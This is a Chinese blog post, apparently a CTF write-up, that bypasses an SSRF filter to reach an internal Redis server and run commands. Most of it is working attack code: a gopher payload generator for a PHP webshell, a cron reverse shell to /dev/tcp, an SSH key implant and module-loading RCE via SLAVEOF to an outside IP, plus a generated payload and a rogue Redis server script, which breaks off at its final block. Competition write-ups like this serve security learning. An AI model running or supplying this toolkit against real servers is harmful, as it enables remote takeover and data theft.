刘功瑞的博客http://www.liugongrui.com/有一天你突然惊醒,发现这一切,都只不过是一场梦。ssrf redis 远程命令执行 rce http://www.liugongrui.com/?id=263<p>网鼎杯玄武组题目,ssrf代码</p><pre class="prism-highlight prism-language-php">&lt;?php function&nbsp;check_inner_ip($url) { &nbsp;&nbsp;&nbsp;&nbsp;$match_result=preg_match(&#39;/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/&#39;,$url); &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$match_result) &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(&#39;url&nbsp;fomat&nbsp;error&#39;); &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;try &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$url_parse=parse_url($url); &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;catch(Exception&nbsp;$e) &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;die(&#39;url&nbsp;fomat&nbsp;error&#39;); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;false; &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;$hostname=$url_parse[&#39;host&#39;]; &nbsp;&nbsp;&nbsp;&nbsp;$ip=gethostbyname($hostname); &nbsp;&nbsp;&nbsp;&nbsp;$int_ip=ip2long($ip); &nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;ip2long(&#39;127.0.0.0&#39;)&gt;&gt;24&nbsp;==&nbsp;$int_ip&gt;&gt;24&nbsp;||&nbsp;ip2long(&#39;10.0.0.0&#39;)&gt;&gt;24&nbsp;==&nbsp;$int_ip&gt;&gt;24&nbsp;||&nbsp;ip2long(&#39;172.16.0.0&#39;)&gt;&gt;20&nbsp;==&nbsp;$int_ip&gt;&gt;20&nbsp;||&nbsp;ip2long(&#39;192.168.0.0&#39;)&gt;&gt;16&nbsp;==&nbsp;$int_ip&gt;&gt;16; } function&nbsp;safe_request_url($url) { &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(check_inner_ip($url)) &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;$url.&#39;&nbsp;is&nbsp;inner&nbsp;ip&#39;; &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;else &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$ch&nbsp;=&nbsp;curl_init(); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;curl_setopt($ch,&nbsp;CURLOPT_URL,&nbsp;$url); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;curl_setopt($ch,&nbsp;CURLOPT_RETURNTRANSFER,&nbsp;1); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;curl_setopt($ch,&nbsp;CURLOPT_HEADER,&nbsp;0); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$output&nbsp;=&nbsp;curl_exec($ch); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$result_info&nbsp;=&nbsp;curl_getinfo($ch); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($result_info[&#39;redirect_url&#39;]) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;safe_request_url($result_info[&#39;redirect_url&#39;]); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;curl_close($ch); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var_dump($output); &nbsp;&nbsp;&nbsp;&nbsp;} } if(isset($_GET[&#39;url&#39;])){ &nbsp;&nbsp;&nbsp;&nbsp;$url&nbsp;=&nbsp;$_GET[&#39;url&#39;]; &nbsp;&nbsp;&nbsp;&nbsp;if(!empty($url)){ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;safe_request_url($url); &nbsp;&nbsp;&nbsp;&nbsp;} } else{ &nbsp;&nbsp;&nbsp;&nbsp;highlight_file(__FILE__); } //&nbsp;Please&nbsp;visit&nbsp;hint.php&nbsp;locally. ?&gt;</pre><p>根据提示需要读取hint.php的内容<br/></p><p><a href="http://39.97.160.127/?url=http://baidu.com@0.0.0.0:80@lgr/hint.php">http://39.97.160.127/?url=http://baidu.com@0.0.0.0:80@lgr/hint.php</a>&nbsp; 可以读取到文件内容</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/06/202006031591148072203416.png" alt="image.png"/></p><p>提示了redis密码是test,应该是要用ssrf打redis,我们直接打rce</p><p>先使用dict探测6379端口,提示noauth,需要密码</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/06/202006031591148149779407.png" alt="image.png"/></p><p><br/></p><p><a href="http://39.97.160.127/?url=dict://baidu.com@0.0.0.0:6379@lgr/AUTH%20test">http://39.97.160.127/?url=dict://baidu.com@0.0.0.0:6379@lgr/AUTH%20test</a></p><p>出现了两个ok,说明密码正确</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/06/202006031591148252155451.png" alt="image.png"/></p><p>使用脚本生成ssrf redis rce 的payload</p><pre class="prism-highlight prism-language-python">#!/usr/local/bin&nbsp;python #coding=utf8 try: &nbsp;&nbsp;&nbsp;&nbsp;from&nbsp;urllib&nbsp;import&nbsp;quote except: &nbsp;&nbsp;&nbsp;&nbsp;from&nbsp;urllib.parse&nbsp;import&nbsp;quote def&nbsp;generate_info(passwd): &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;cmd=[ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;info&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;quit&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;] &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;passwd: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd.insert(0,&quot;AUTH&nbsp;{}&quot;.format(passwd)) &nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;cmd def&nbsp;generate_shell(filename,path,passwd,payload): &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;cmd=[&quot;flushall&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;set&nbsp;1&nbsp;{}&quot;.format(payload), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;config&nbsp;set&nbsp;dir&nbsp;{}&quot;.format(path), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;config&nbsp;set&nbsp;dbfilename&nbsp;{}&quot;.format(filename), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;save&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;quit&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;] &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;passwd: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd.insert(0,&quot;AUTH&nbsp;{}&quot;.format(passwd)) &nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;cmd def&nbsp;generate_reverse(filename,path,passwd,payload):&nbsp;#&nbsp;centos &nbsp;&nbsp;&nbsp;&nbsp;cmd=[&quot;flushall&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;set&nbsp;1&nbsp;{}&quot;.format(payload), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;config&nbsp;set&nbsp;dir&nbsp;{}&quot;.format(path), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;config&nbsp;set&nbsp;dbfilename&nbsp;{}&quot;.format(filename), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;save&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;quit&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;] &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;passwd: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd.insert(0,&quot;AUTH&nbsp;{}&quot;.format(passwd)) &nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;cmd &nbsp;&nbsp;&nbsp;&nbsp; def&nbsp;generate_sshkey(filename,path,passwd,payload): &nbsp;&nbsp;&nbsp;&nbsp;cmd=[&quot;flushall&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;set&nbsp;1&nbsp;{}&quot;.format(payload), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;config&nbsp;set&nbsp;dir&nbsp;{}&quot;.format(path), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;config&nbsp;set&nbsp;dbfilename&nbsp;{}&quot;.format(filename), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;save&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;quit&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;] &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;passwd: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd.insert(0,&quot;AUTH&nbsp;{}&quot;.format(passwd)) &nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;cmd &nbsp;&nbsp;&nbsp;&nbsp; def&nbsp;generate_rce(lhost,lport,passwd,command=&quot;cat&nbsp;/etc/passwd&quot;): &nbsp;&nbsp;&nbsp;&nbsp;exp_filename=&quot;exp.so&quot; &nbsp;&nbsp;&nbsp;&nbsp;cmd=[ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;SLAVEOF&nbsp;{}&nbsp;{}&quot;.format(lhost,lport), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;CONFIG&nbsp;SET&nbsp;dir&nbsp;/tmp/&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;config&nbsp;set&nbsp;dbfilename&nbsp;{}&quot;.format(exp_filename), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;MODULE&nbsp;LOAD&nbsp;/tmp/{}&quot;.format(exp_filename), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;system.exec&nbsp;{}&quot;.format(command.replace(&quot;&nbsp;&quot;,&quot;${IFS}&quot;)), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&quot;SLAVEOF&nbsp;NO&nbsp;ONE&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&quot;CONFIG&nbsp;SET&nbsp;dbfilename&nbsp;dump.rdb&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&quot;system.exec&nbsp;rm${IFS}/tmp/{}&quot;.format(exp_filename), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&quot;MODULE&nbsp;UNLOAD&nbsp;system&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;quit&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;] &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;passwd: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd.insert(0,&quot;AUTH&nbsp;{}&quot;.format(passwd)) &nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;cmd def&nbsp;rce_cleanup(): &nbsp;&nbsp;&nbsp;&nbsp;exp_filename=&quot;exp.so&quot; &nbsp;&nbsp;&nbsp;&nbsp;cmd=[ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;SLAVEOF&nbsp;NO&nbsp;ONE&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;CONFIG&nbsp;SET&nbsp;dbfilename&nbsp;dump.rdb&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;system.exec&nbsp;rm&nbsp;/tmp/{}&quot;.format(exp_filename).replace(&quot;&nbsp;&quot;,&quot;${IFS}&quot;), &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;MODULE&nbsp;UNLOAD&nbsp;system&quot;, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;quit&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;] &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;passwd: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd.insert(0,&quot;AUTH&nbsp;{}&quot;.format(passwd)) &nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;cmd def&nbsp;redis_format(arr): &nbsp;&nbsp;&nbsp;&nbsp;CRLF=&quot;\r\n&quot; &nbsp;&nbsp;&nbsp;&nbsp;redis_arr&nbsp;=&nbsp;arr.split(&quot;&nbsp;&quot;) &nbsp;&nbsp;&nbsp;&nbsp;cmd=&quot;&quot; &nbsp;&nbsp;&nbsp;&nbsp;cmd+=&quot;*&quot;+str(len(redis_arr)) &nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;x&nbsp;in&nbsp;redis_arr: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd+=CRLF+&quot;$&quot;+str(len((x)))+CRLF+x &nbsp;&nbsp;&nbsp;&nbsp;cmd+=CRLF &nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;cmd def&nbsp;generate_payload(passwd,mode): &nbsp;&nbsp;&nbsp;&nbsp;payload=&quot;test&quot; &nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;mode&nbsp;==0: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;filename=&quot;shell.php&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;path=&quot;/var/www/html&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;shell=&quot;\n\n&lt;?=eval($_GET[0]);?&gt;\n\n&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd=generate_shell(filename,path,passwd,shell) &nbsp;&nbsp;&nbsp;&nbsp;elif&nbsp;mode==1:&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;filename=&quot;root&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;path=&quot;/var/spool/cron/&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;shell=&quot;\n\n*/1&nbsp;*&nbsp;*&nbsp;*&nbsp;*&nbsp;bash&nbsp;-i&nbsp;&gt;&amp;&nbsp;/dev/tcp/192.168.1.1/2333&nbsp;0&gt;&amp;1\n\n&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd=generate_reverse(filename,path,passwd,shell.replace(&quot;&nbsp;&quot;,&quot;^&quot;)) &nbsp;&nbsp;&nbsp;&nbsp;elif&nbsp;mode==2: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;filename=&quot;authorized_keys&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;path=&quot;/root/.ssh/&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;pubkey=&quot;\n\nssh-rsa&nbsp;&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd=generate_sshkey(filename,path,passwd,pubkey.replace(&quot;&nbsp;&quot;,&quot;^&quot;)) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;elif&nbsp;mode==3: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;lhost=&quot;122.51.254.197&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;lport=&quot;5555&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;command=&quot;whoami&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd=generate_rce(lhost,lport,passwd,command) &nbsp;&nbsp;&nbsp;&nbsp;elif&nbsp;mode==31: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd=rce_cleanup() &nbsp;&nbsp;&nbsp;&nbsp;elif&nbsp;mode==4: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd=generate_info(passwd) &nbsp;&nbsp;&nbsp;&nbsp;protocol=&quot;gopher://&quot; &nbsp;&nbsp;&nbsp;&nbsp;ip=&quot;127.0.0.1&quot; &nbsp;&nbsp;&nbsp;&nbsp;port=&quot;6379&quot; &nbsp;&nbsp;&nbsp;&nbsp;payload=protocol+ip+&quot;:&quot;+port+&quot;/_&quot; &nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;x&nbsp;in&nbsp;cmd: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;payload&nbsp;+=&nbsp;quote(redis_format(x).replace(&quot;^&quot;,&quot;&nbsp;&quot;)) &nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;payload &nbsp;&nbsp;&nbsp;&nbsp; if&nbsp;__name__==&quot;__main__&quot;:&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;0&nbsp;for&nbsp;webshell&nbsp;;&nbsp;1&nbsp;for&nbsp;re&nbsp;shell&nbsp;;&nbsp;2&nbsp;for&nbsp;ssh&nbsp;key&nbsp;;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;3&nbsp;for&nbsp;redis&nbsp;rce&nbsp;;&nbsp;31&nbsp;for&nbsp;rce&nbsp;clean&nbsp;up &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;4&nbsp;for&nbsp;info &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;suggest&nbsp;cleaning&nbsp;up&nbsp;when&nbsp;mode&nbsp;3&nbsp;used &nbsp;&nbsp;&nbsp;&nbsp;mode=3 &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;input&nbsp;auth&nbsp;passwd&nbsp;or&nbsp;leave&nbsp;blank&nbsp;for&nbsp;no&nbsp;pw &nbsp;&nbsp;&nbsp;&nbsp;passwd&nbsp;=&nbsp;&#39;test&#39;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;p=generate_payload(passwd,mode) &nbsp;&nbsp;&nbsp;&nbsp;print(p)</pre><p><img src="http://www.liugongrui.com/zb_users/upload/2020/06/202006031591148523934939.png" alt="image.png"/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/06/202006031591148818762749.png" alt="image.png"/></p><p>gopher://127.0.0.1:6379/_%2A2%0D%0A%244%0D%0AAUTH%0D%0A%244%0D%0Atest%0D%0A%2A3%0D%0A%247%0D%0ASLAVEOF%0D%0A%2414%0D%0A122.51.254.197%0D%0A%244%0D%0A5555%0D%0A%2A4%0D%0A%246%0D%0ACONFIG%0D%0A%243%0D%0ASET%0D%0A%243%0D%0Adir%0D%0A%245%0D%0A/tmp/%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%246%0D%0Aexp.so%0D%0A%2A3%0D%0A%246%0D%0AMODULE%0D%0A%244%0D%0ALOAD%0D%0A%2411%0D%0A/tmp/exp.so%0D%0A%2A2%0D%0A%2411%0D%0Asystem.exec%0D%0A%242%0D%0Aid%0D%0A%2A1%0D%0A%244%0D%0Aquit%0D%0A</p><p><br/></p><p>配置好redis rogue 服务器的ip和端口 ,还有执行的命令</p><p>在自己的服务器上启动redis rogue server,代码如下</p><pre class="prism-highlight prism-language-python">import&nbsp;socket import&nbsp;time &nbsp; CRLF=&quot;\r\n&quot; payload=open(&quot;exp.so&quot;,&quot;rb&quot;).read() exp_filename=&quot;exp.so&quot; &nbsp; def&nbsp;redis_format(arr): &nbsp;&nbsp;&nbsp;&nbsp;global&nbsp;CRLF &nbsp;&nbsp;&nbsp;&nbsp;global&nbsp;payload &nbsp;&nbsp;&nbsp;&nbsp;redis_arr=arr.split(&quot;&nbsp;&quot;) &nbsp;&nbsp;&nbsp;&nbsp;cmd=&quot;&quot; &nbsp;&nbsp;&nbsp;&nbsp;cmd+=&quot;*&quot;+str(len(redis_arr)) &nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;x&nbsp;in&nbsp;redis_arr: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmd+=CRLF+&quot;$&quot;+str(len(x))+CRLF+x &nbsp;&nbsp;&nbsp;&nbsp;cmd+=CRLF &nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;cmd &nbsp; def&nbsp;redis_connect(rhost,rport): &nbsp;&nbsp;&nbsp;&nbsp;sock=socket.socket() &nbsp;&nbsp;&nbsp;&nbsp;sock.connect((rhost,rport)) &nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;sock &nbsp; def&nbsp;send(sock,cmd): &nbsp;&nbsp;&nbsp;&nbsp;sock.send(redis_format(cmd)) &nbsp;&nbsp;&nbsp;&nbsp;print(sock.recv(1024).decode(&quot;utf-8&quot;)) &nbsp; def&nbsp;interact_shell(sock): &nbsp;&nbsp;&nbsp;&nbsp;flag=True &nbsp;&nbsp;&nbsp;&nbsp;try: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;flag: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;shell=raw_input(&quot;\033[1;32;40m[*]\033[0m&nbsp;&quot;) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;shell=shell.replace(&quot;&nbsp;&quot;,&quot;${IFS}&quot;) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;shell==&quot;exit&quot;&nbsp;or&nbsp;shell==&quot;quit&quot;: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;flag=False &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;else: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;send(sock,&quot;system.exec&nbsp;{}&quot;.format(shell)) &nbsp;&nbsp;&nbsp;&nbsp;except&nbsp;KeyboardInterrupt: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return &nbsp; &nbsp; def&nbsp;RogueServer(lport): &nbsp;&nbsp;&nbsp;&nbsp;global&nbsp;CRLF &nbsp;&nbsp;&nbsp;&nbsp;global&nbsp;payload &nbsp;&nbsp;&nbsp;&nbsp;flag=True &nbsp;&nbsp;&nbsp;&nbsp;result=&quot;&quot; &nbsp;&nbsp;&nbsp;&nbsp;sock=socket.socket() &nbsp;&nbsp;&nbsp;&nbsp;sock.bind((&quot;0.0.0.0&quot;,lport)) &nbsp;&nbsp;&nbsp;&nbsp;sock.listen(10) &nbsp;&nbsp;&nbsp;&nbsp;clientSock,&nbsp;address&nbsp;=&nbsp;sock.accept() &nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;flag: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;data&nbsp;=&nbsp;clientSock.recv(1024) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;&quot;PING&quot;&nbsp;in&nbsp;data: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;result=&quot;+PONG&quot;+CRLF &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;clientSock.send(result) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;flag=True &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;elif&nbsp;&quot;REPLCONF&quot;&nbsp;in&nbsp;data: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;result=&quot;+OK&quot;+CRLF &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;clientSock.send(result) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;flag=True &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;elif&nbsp;&quot;PSYNC&quot;&nbsp;in&nbsp;data&nbsp;or&nbsp;&quot;SYNC&quot;&nbsp;in&nbsp;data: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;result&nbsp;=&nbsp;&quot;+FULLRESYNC&nbsp;&quot;&nbsp;+&nbsp;&quot;a&quot;&nbsp;*&nbsp;40&nbsp;+&nbsp;&quot;&nbsp;1&quot;&nbsp;+&nbsp;CRLF &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;result&nbsp;+=&nbsp;&quot;$&quot;&nbsp;+&nbsp;str(len(payload))&nbsp;+&nbsp;CRLF &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;result&nbsp;=&nbsp;result.encode() &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;result&nbsp;+=&nbsp;payload &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;result&nbsp;+=&nbsp;CRLF &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;clientSock.send(result) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;flag=False &nbsp; if&nbsp;__name__==&quot;__main__&quot;: 